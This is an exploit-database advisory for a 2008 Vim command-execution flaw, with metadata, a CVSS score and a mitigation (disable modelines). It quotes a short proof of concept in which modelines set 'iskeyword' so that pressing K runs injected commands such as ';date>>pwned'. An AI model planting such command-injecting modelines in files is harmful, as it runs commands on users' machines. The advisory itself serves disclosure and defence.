Vim Command-Execution Vulnerabilities

vendor:

Vim

by:

SecurityFocus

7.5

CVSS

HIGH

Command-Execution

CWE

Product Name: Vim

Affected Version From: Vim 7.2.010

Affected Version To: Prior Versions

Patch Exists: YES

Related CWE: N/A

CPE: a:vim:vim

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Vim Command-Execution Vulnerabilities

Vim is prone to multiple command-execution vulnerabilities because the application fails to sufficiently sanitize user-supplied data. Successfully exploiting these issues can allow an attacker to execute arbitrary commands with the privileges of the user running the affected application.

Mitigation:

Disable modeline processing and manually set the 'iskeyword' option.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/30795/info

Vim is prone to multiple command-execution vulnerabilities because the application fails to sufficiently sanitize user-supplied data.

Successfully exploiting these issues can allow an attacker to execute arbitrary commands with the privileges of the user running the affected application.

Versions prior to Vim 7.2.010 are vulnerable. 

Copy-and-paste these examples into separate files:

;xclock
vim: set iskeyword=;,@

Place your cursor on ``xclock'', and press K. xclock appears.

;date>>pwned
vim: set iskeyword=1-255

Place your cursor on ``date'' and press K. File ``pwned'' is created in
the current working directory.

Please note: If modeline processing is disabled, set the 'iskeyword'
option manually.